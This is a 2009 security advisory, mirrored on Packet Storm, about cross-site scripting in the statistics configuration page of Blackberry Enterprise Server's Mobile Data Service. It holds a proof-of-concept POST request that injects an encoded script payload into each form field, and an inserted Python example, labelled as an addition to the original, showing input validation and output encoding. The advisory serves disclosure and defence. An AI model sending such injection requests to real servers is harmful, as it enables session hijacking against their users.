Blackberry Mobile Data Service XSS

2009-04-17T00:00:00
ID PACKETSTORM:76782
Type packetstorm
Reporter Michael Thumann
Modified 2009-04-17T00:00:00

Description

                                        
                                            `ERNW Security Advisory 01-2009  
  
XSS in Blackberry's Mobile Data Service Connection Service  
  
Author: Michael Thumann <mthumann[at]ernw.de>  
  
1. Summary  
The Blackberry Mobile Data Service Connection is vulnerable to  
several XSS attacks in the "Customize Statistics Page".  
  
2. CVSS V2 Base Score : 3.5 (based on vendor rating)  
  
3. Products affected  
Blackberry Enterprise Server: all versions prior to 4.1.6 MR4  
  
4. Patch Availability : A patch is available from the vendor.  
  
5. Details   
Injecting scripts (containing standard and encoded XSS attacks) into  
all the fields of the "Customize Statistics Page" reveals that none  
of the fields are properly validated for malicious input and the  
output isn't sanitized.  
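
The two missing controls named above, allow-list input validation and output encoding, shown as an added example that is not part of the original advisory or the vendor's code. It is written in Python for illustration; the field names come from the request in section 8, while the accepted formats and the helper names `validate_form` and `render_field` are assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Field names are taken from the advisory's request. The accepted formats
# are ASSUMPTIONS for this example, not the vendor's specification.
INT = re.compile(r"[0-9]{1,6}")
FIELD_RULES = {
    "customDate": re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}"),
    "referenceTime": re.compile(r"[0-9]{1,13}"),
    "action": re.compile(r"[A-Za-z]{1,32}"),
    **{name: INT for name in (
        "interval", "lastCustomInterval", "lastIntervalLength",
        "nextCustomInterval", "nextIntervalLength",
        "delIntervalIndex", "addStatIndex", "delStatIndex")},
}


def validate_form(body):
    """Split a form-urlencoded body into accepted and rejected fields."""
    accepted, rejected = {}, {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        rule = FIELD_RULES.get(name)
        # Reject unknown fields, repeated fields and format mismatches.
        if rule and len(values) == 1 and rule.fullmatch(values[0]):
            accepted[name] = values[0]
        else:
            rejected[name] = values
    return accepted, rejected


def render_field(name, value):
    """Echo a value into an HTML attribute with output encoding applied."""
    return '<input name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


# Constructed sample body: one well-formed field and two fields carrying
# the probe string from the advisory's request.
PROBE = "%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E"
SAMPLE_BODY = "interval=15&customDate=" + PROBE + "&addStatIndex=" + PROBE

if __name__ == "__main__":
    accepted, rejected = validate_form(SAMPLE_BODY)
    print("accepted:", accepted)
    print("rejected:", sorted(rejected))
    # Output encoding keeps a value inert even if validation is bypassed.
    print(render_field("customDate", rejected["customDate"][0]))
```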
  
6. Solution   
Update the affected products to the current version.  
  
7. Time-Line   
16 Feb 2009: Discovery of the vulnerability   
02 Mar 2009: Vulnerability reported to vendor   
02 Mar 2009: Answer from vendor   
16 Apr 2009: Patch available   
16 Apr 2009: Public Disclosure  
  
8. Exploit   
POST /admin/statistics/ConfigureStatistics HTTP/1.0   
Cookie: JSESSIONID=....   
Content-Length: 753   
Accept: */*   
Accept-Language: en-US  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)   
Host: ...  
Content-Type: application/x-www-form-urlencoded   
Referer: http://x:8080/admin/statistics/ConfigureStatistics  
  
customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E  
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%  
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript  
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%  
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E  
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&  
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E  
  
9. Thanks  
We would like to thank the guys from Blackberry for working  
together on this issue in a professional and responsible way.  
  
10. Disclaimer   
The information in this advisory is provided "AS IS"  
without warranty of any kind. In no event shall the authors be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages due to the  
misuse of any information provided in this advisory.  
  